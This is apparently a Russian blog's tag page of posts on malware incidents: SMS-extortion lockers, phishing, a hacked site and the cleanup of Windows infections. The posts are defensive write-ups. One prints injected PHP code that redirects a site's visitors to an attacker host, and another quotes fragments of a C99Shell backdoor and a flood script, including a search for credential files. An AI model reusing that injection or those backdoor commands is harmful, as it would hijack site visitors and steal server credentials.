Тэг ‘вирус’

Symantec Антивирус скачать бесплатно Endpoint Protection

Антивирус Symantec уже довольно давно зарекомендовал себя с хорошей стороны - далеко не последние места в различных тестах антивирусов (ссылки не привожу, т.к. лучше ориентироваться на актуальные тесты). Однако, сравнительно недавно появилась возможность скачать бесплатно антивирус Symantec (да-да.. без регистрации и без СМС :)) читать про бесплатный антивирус Symantec

Опубликовано Июнь 14, 2012 | автор: levik  |  Комментарии (2) »

Вирус на сайте - введите номер телефона

Столкнулся с интересной ситуацией - сайт якобы для защиты от спам-пользователей просит ввести свой номер телефона.

В последнее время наш сайт регулярно стал подвергаться атакам со стороны спам ботов. Для предотвращения данной ситуации мы приняли решение ввести обязательную смс авторизацию для всех посетителей. Введите номер Вашего телефона, на него придет БЕСПЛАТНОЕ смс сообщение с кодом авторизации.

Однако, владелец сайта не в курсе такой защиты.. Как оказалось, вариаций может быть несколько (к примеру, предупреждение от Google об опасности на сайте и тд). При этом предупреждение закрывается без ввода CMC, но открывается через некоторое время. Вот код, который приводил к открытию:
< ?php
$rSite = '***.servehttp.com'; // имя сайта заменено
if(!isset($_SERVER['REQUEST_URI']))
$_SERVER['REQUEST_URI'] = '';
$redirectURL = 'http://'.$rSite.$_SERVER['REQUEST_URI'];
if(isset($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['arx_tt']))
if(!preg_match("|^http://$rSite|i",$_SERVER['HTTP_REFERER'])){
setcookie('arx_tt','1',time()+4*3600,'/');
exit( '<script>document.location.href="'.$redirectURL.'";');
}
setcookie('arx_tt','1',time()+4*3600,'/');

Вредоносный код, который встраивается на сайт и требует ввести СМС был размещён явно “вручную” в include-файлах, которые подключались при выводе практически всех страниц..

Опубликовано Март 9, 2012 | автор: levik  |  Комментарии (2) »

В диспетчере устройств пусто

При попытке открыть диспетчер устройств в Windows XP само окошко открывается, однако в диспетчере устройств пусто. То есть устройств нет вообще, даже компьютера :)

Кроме того, некоторые устройства при подключении к компьютеру не определялись.

Немного погуглив, нашёл информацию про вирус Apropos, который можно вылечить при помощи бесплатной утилиты AproposFix - следует перегрузить компьютер в безопасном режиме, извлечь архив и запустить RunThis.bat, который после завершения работы сохранит файл отчёта.

На компьютере был установлен антивирус - поэтому способ был отложен на крайний случай.

Ещё одна ситуация, когда диспетчер задач может быть пустым - проблемы службы Plug And Play.

В разделе реестра HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PlugPlay следует прописать REG_EXPAND_SZ (Расширяемый строковый параметр) с именем ImagePath и значением %SystemRoot%\system32\services.exe

Опубликовано Январь 11, 2012 | автор: levik  |  Нет комментариев »

Фишинг

Нередки случаи получения писем от солидных сайтов/компаний, от крупных социальных сетей.. с информацией об изменении данных, условий или необходимостью проверить конфиденциальные данные. При этом в письме, которое оформлено в соответствующем стиле, присутствует ссылка, ведущая на сайт, который внешне похож, но на самом деле отличается от упоминаемого.

При попытке войти на такой сайт под своим логином/паролем, данные отправляются на “фиктивный” сайт, к злоумышленнику. Именно такой способ получения конфиденциальных данных и доступа к ним называется фишингом.

1. Мошенники рассылают тысячи сообщений электронной почты на адреса, выбранные случайным образом. Эти сообщения выглядят как письма от известной компании.

2. В сообщении электронной почты Вас могут настоятельно призывать нажать на ссылку, чтобы обновить учетные данные. Ссылка приведет Вас на веб-сайт мошенников, который имитирует настоящий сайт компании.

3. На сайте мошенников Вас попросят предоставить конфиденциальную информацию. Вы думаете, что предоставляете информацию надежной компании, но на самом деле, ее получает преступник.

Если веб-сайт запрашивает ввод конфиденциальной информации, проверьте, что в адресной строке браузера адрес начинается с “https”. Несколько раз следует проверить адрес сайта - часто мошенники подставляют опечатки или похожие символы (I и l , tk вместо kt) Можно воспользоваться проверенным способом - ввести адрес в поисковике - поисковик, как правило, выдает на первом месте “истинный” сайт, а не фишинговый.

Браузеры последних поколений используют общую базу фишинговых сайтов - при попытке зайти на такой сайт пользователю показывается предупреждение о том, что сайт “не является тем, за кого себя выдаёт”…

Будьте бдительны

Опубликовано Июль 19, 2011 | автор: levik  |  Нет комментариев »

php создает критическую нагрузку на сеть - m0f0,

Сообщение от хостера, краткий смысл которого примерно такой: файлом www/config.php создавалась критическая нагрузка на сетевую подсистему виртуального хостинга, отключаем до устранения проблемы.

Странно.. сайты не предназначены для обмена большими порциями информации, огромной посещаемости также нет. Откуда же берется критическая нагрузка? (причем нагрузка не на процессор или перерасход памяти.. а именно нагрузка на сеть?)

Беглый анализ показал, что ряд файлов имеет более позднюю дату создания… Среди них особо выделялись файлы с такими именами:
www\2ndindex.php
www\httpdocs.pl
www\config.php
www\indexfixer.php

Проверка файлов антивирусом Касперского выявила всего один вредоносный файл: троянская программа Backdoor.PHP.C99Shell.au www/2ndindex.php

Если заглянуть внутрь - без особого труда можно узреть “злонамеренное” поведение -

for($i=0;$i<65000;$i++){
$out .= ‘X’;
}

fwrite($fp, $out);

find / -type f -name service.pwd

m0f0 ddos priv8 by t0fx
sub  udpflooder
скрипт коннектится к IRC :), и, управляется командами из чата…

и другое.

Если Вы получили сообщение о критической нагрузке на сеть, в особенности, если сайт “не громоздкий” и не работает “по сети” самостоятельно, то, лучше лишний раз перестраховаться и проверить. “Ниоткуда” нагрузка не берется.

Удачи!

Опубликовано Сентябрь 24, 2010 | автор: levik  |  Комментарии (2) »

DrWeb Spider Gate - не удалось найти действительный ключевой файл

На компьютере стояла лицензионная пятая версия “Доктор Веб”. Предложение “бесплатно обновить”  на шестую доктор выдавал при каждом обновлении баз. Естественно, в какой-то момент щелкать на “спасибо не надо обновлять” надоело - было принято решение обновиться до шестой версии. Правда, после скачивания она ещё некоторое время полежала на компьютере.. до очередного предупреждения об обновлении..

После обновления с версии 5 на версию 6 DrWeb при загрузке стал выдавать предупреждение:

Ошибка SpiDer Gate
Не удалось найти действительный ключевой файл. Приложение будет закрыто.

При получении такого сообщения следует первым делом проверить лицензионный файл. Это можно сделать при помощи менеджера лицензий DrWeb (или заглянуть в файл .key в каталоге DrWeb и посмотреть в строке Applications=). Если лицензия не распространяется на SpiderGate и Mail - оба компонента можно смело удалять… После удаления сообщение о закрытии приложения появляться не будет. Еще можно раскошелиться на лицензию для DrWeb Security Space Pro с поддержкой этих компонентов. Все-таки web-антивирус не помешает.

UPD похожая ситуация, однако с лицензиями всё в порядке…

Причиной ошибки послужило “кэширование” в Windows Vista

удалите папку \Users\[ваше имя пользователя]\AppData\Local\VirtualStore\Program Files\DrWeb и перезагрузитесь.
http://forum.drweb.com/index.php?showtopic=278183

Пользуйтесь лицензионными антивирусами и не забывайте обновляться (настройте автоматическое обновление антивирусных баз)

Опубликовано Июнь 29, 2010 | автор: levik  |  Нет комментариев »

Порно информер требует отправить SMS с кодом 1011424 на номер 5121

Очередной порно информер, требующий для разблокировки Windows отправить SMS с кодом 1011424 на номер 5121. Эх, картинки нету… :(

Сделан довольно оригинально - внешне напоминает Internet Explorer с открытым сайтом .com. Однако,  если обратить внимание на стиль окон, видно, что это не совсем IE от Windows (да и с версей IE не ладится - значок от ie 6, а выглядит “под восьмерку”). И надпись - мол, мы не блокируем программы, мы не вирус :) Хотя, розовый стиль и легко одетые женщины уже порядком надоели…

Что ж… идем на сайт DrWeb и получаем код “1238396875″ (DrWeb позволяет отправлять бесплатные SMS на короткие номера???) . Конечно, вирус этот код не удалит, однако первое время работать можно будет.

Ручными поисками заниматься не стал - прогнал компьютер LiveCD со свежими базами. (вирус с бородой попался)

Нашел кучу всякой гадости типа NtRootkit в system_volume_information, Officla48 (в одном из tmp файлов и в C:\windows\srnh.lto). Последнее подгружалось в реестре (”расширенный” boot, shell  до Explorer.exe rundll32.exe srnh.lto iqfnr). Чистим до просто “Explorer”, не забываем поставить свежий антивирус.. и всё. :)

Удачи

Опубликовано Май 31, 2010 | автор: levik  |  Нет комментариев »

Вирус Winlock просит отправить СМС с текстом T701016100 на номер 3381

Очередной вирус из серии “отправь СМС и разблокируй компьютер” (Winlock) с текстом T701016100 (Т701016100) на короткий номер 3381.

Порно баннер требует отправить СМС с текстом T701016100 на номер 33810

При загрузке всех программ из автозагрузки вылетает куча сообщений об ошибке “память не может быть written”. Чуть позже появляется баннер, закрывающий центральную часть экрана. Опять же розовый фон, порно-банер и дамы из фильмов по бокам (почти как при установке баннера для доступа на наш сайт) :) В разблокираторах от DrWeb и Kaspersky информации о таком номере, вирусе, баннере пока нет. Сканирование CureIt-ом выявило 6 файлов с тремя разными вирусами (один из них - разновидность winlock-а). Однако, после перезагрузки почти сразу появился порно баннер.

Касперский, нод и антивирусные утилиты не запускаются.

Для временной разблокировки подошел  код “279346830“, (подсмотрено на форуме - номер 3381 текст Т701016100 код F64W28E - не проверял.) Однако, естественно, что введенный код не гарантирует полного удаления программы с компьютера. Он вообще ничего не гарантирует - только (в лучшем случае) позволяет на некоторое время возобновить работу компьютера.

Загрузка с LiveCD (WinPE, можно записанный на USB), привязка реестра системного диска и просмотр утилитой HIjackThis выявил пару “сомнительных строчек”:
F2 - REG:system.ini: Shell=Explorer.exe rundll32.exe srnh.lto iqfnr
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\… (далее следует довольно внушительный список exe-файлов с сомнительными именами)

Предварительно лучше вычистить все эти файлы (я копирую в отдельный каталог для “вирусов”, чтобы после лечения отправить, например, на virustotal - на момент отправки, обычно, вирус в файле распознают не больше 7-8 антивирусных программ.)

Отмечаем сомнительные пункты галочкой и кнопкой “FixIt” (не выходя из ХайДжека) автоматически исправляем значения реестра.

Про методы лечения можно посмотерть в статьях про блокирующий компьютер “липовый” Internet Security, Ubest NetSpeed Pro. Если судить по предыдущим подобным вирусным “блокираторам”, то в скором времени (не позднее пары дней) антивирусы внесут информацию о нем в базы.

UPD. Действительно, CureIt с новыми базами (от 21.05.2010) нашла две DLL-ки с короткими именами (bx.dll и mx.dll) в %WINDIR%\system32 с вирусом WIN32.HLLW.Autoruner.21042

Опубликовано Май 16, 2010 | автор: levik  |  Комментарии (15) »

Вирус JS/Exploit.JavaDepKit.A trojan

После посещения сайта (ссылку приводить не буду :) - в подвале сайта, как довольно часто случается прописался злостный javascript-вирус, который потянул за собой ещё кучу вирусов) Нод выдал кучу предупреждений:

IMON    file    http://gripgrate.ru:8080/Applet1.html    JS/Exploit.JavaDepKit.A trojan
AMON    file    C:\WINDOWS\system32\fjhdyfhsn.bat    BAT/KillFiles.NCB trojan    quarantined - deleted        Event occurred on a modified file. The file was moved to quarantine. You may close this window.
AMON    file    C:\WINDOWS\system32\fjhdyfhsn.bat    BAT/KillFiles.NCB trojan    quarantined - deleted        Event occurred on a modified file. The file was moved to quarantine. You may close this window.

И дальше - куча вирусов вида:

AMON    file    C:\WINDOWS\system32\drivers\atmarpc.sys    Win32/Bubnix.AH trojan    quarantined - deleted    Event occurred on a new file created by the application: C:\Program Files\Internet Explorer\iexplore.exe. The file was moved to quarantine. You may close this window.
AMON    file    C:\WINDOWS\system32\drivers\asyncmac.sys    Win32/Bubnix.AH trojan    quarantined - deleted    Event occurred on a new file created by the application: C:\Program Files\Internet Explorer\iexplore.exe. The file was moved to quarantine. You may close this window.
AMON    file    C:\WINDOWS\system32\drivers\aec.sys    Win32/Bubnix.AH trojan    quarantined - deleted    Event occurred on a new file created by the application: C:\Program Files\Internet Explorer\iexplore.exe. The file was moved to quarantine. You may close this window.

ПО поводу первого нашел только у ESET (наверное, у остальных антивирусов он по-другому называется)
http://www.eset.com/blog/2010/04/15/unpatched-java-deployment-kit-vulnerability-exploited-in-the-wild

Гадость эта прописывается ещё и в автозагрузку.
C:\WINDOWS\system32\fjhdyfhsn.bat BAT/KillFiles.NCB trojan

Проверка drweb CureIt выявила парочку вирусов. Однако, компьютер так и не загрузился. Kaspersky AVP Tool нашел вирусы в каталогах Java. Однако, загрузка так и не “пошла” - после входа в windows появляется рабочий стол, однако, похоже, куча служб “зависает” и подвешивает систему - мышка ходит, над “Пуском” крутятся часики, однако никаких других действий выполнить нельзя.

В каталоге System32/drivers  нашел файлы .sys.bak (aec.sys.bak, asyncmac.sys.bak, cdaudio.sys.bak) - видимо, зараза аккуратно забэкапилась :) Или удалить не получилось. Скопировал оригинальные.

Опубликовано Май 4, 2010 | автор: levik  |  Нет комментариев »

services.exe ломится на seozavrsss.com или черный квадрат

Очередная зараза..Черные квадратики

seozavrss-services

После включения предупреждений обнаружил, что services.exe  ломится на seozavrsss.com

В каталоге system32 несколько “подписанных” файлов с иконками в виде черных квадратов (тоже мне, Малевичи..) . Что характерно, у файлов был разный размер (83968 и 78848) и разные результаты по определению на virustotal :)

Seozavrsss.com

Результаты проверки файла LnnCegn.exe на virustotal: 6/42 (14.29%)

Файл bDI8Lbn.exe получен 2010.03.29 10:01:30 (UTC)
Антивирус Версия Обновление Результат
AVG 9.0.0.787 2010.03.29 SHeur3.NNU
CAT-QuickHeal 10.00 2010.03.29 (Suspicious) - DNAScan
Comodo 4424 2010.03.29 TrojWare.Win32.Trojan.Agent.Gen
Prevx 3.0 2010.03.29 High Risk Cloaked Malware
Sunbelt 6112 2010.03.29 Trojan.Win32.Generic.pak!cobra
Symantec 20091.2.0.41 2010.03.29 Suspicious.Insight
Дополнительная информация
File size: 83968 bytes
MD5 : 9865344469b8a56658c5d42b303fd1d4

у файла RpMk9en.exe размером 78848 байт (тоже “черный квадрат”) процент определения получше, но далеко от сотни:

Файл fQGJclM.exe получен 2010.03.18 15:59:19 (UTC)
Антивирус Версия Обновление Результат
Avast 4.8.1351.0 2010.03.18 Win32:Malware-gen
Avast5 5.0.332.0 2010.03.18 Win32:Malware-gen
AVG 9.0.0.787 2010.03.18 SHeur3.GGO
CAT-QuickHeal 10.00 2010.03.18 (Suspicious) - DNAScan
Comodo 4305 2010.03.18 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.1.12222 2010.03.18 Trojan.Packed.19777
GData 19 2010.03.18 Win32:Malware-gen
Kaspersky 7.0.0.125 2010.03.18 Trojan.Win32.Scar.bwas
NOD32 4955 2010.03.18 a variant of Win32/Kryptik.DBM
Panda 10.0.2.2 2010.03.18 Suspicious file
Sunbelt 5952 2010.03.18 Trojan.Win32.Generic.pak!cobra
Symantec 20091.2.0.41 2010.03.18 Suspicious.Insight
TrendMicro 9.120.0.1004 2010.03.18 TROJ_AGENT.SMH
Дополнительная информация
File size: 78848 bytes
MD5 : d238db1969b8f0b06dff9f2b070dd468

Многие распространенные антивирусы пока “молчат” - значит или “показалось”, или ждать беды. :)

Хотя, судя по датам, второй просто более ранняя версия, а первый получился после модификации этого второго. Если все правильно, то где-то в загрузке должен быть запуск “последней версии” :)

И действительно, в логах HiJackThis нашел такое:
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\e25a76c4.exe,\\?\globalroot\systemroot\system32\feyTk89.exe,\\?\globalroot\systemroot\system32\LnnCegn.exe,

feyTk89.exe пару дней назад был опознан и удален. А вот LnnCegn неплохо устроился в system32.

Почистил. Пока работает. Файлы заслал “куда надо” - может чего скажут…

ps. При попытке зайти в “назначенные задания” компьютер вылетел с синим экраном.

pps  http://www.malwaredomainlist.com/mdl.php?search=seozavrsss&colsearch=All - информации о seozavrsss.com не так уж много. Других сайтов по поиску не нашлось

ppps Касперский прислал отчет - 3 файла из отправленных - вирусы. а вот 4 (тот который на virustotal не определился) - не знаю :)  мол, будем посмотреть. :)

Опубликовано Март 29, 2010 | автор: levik  |  Комментарий (1) »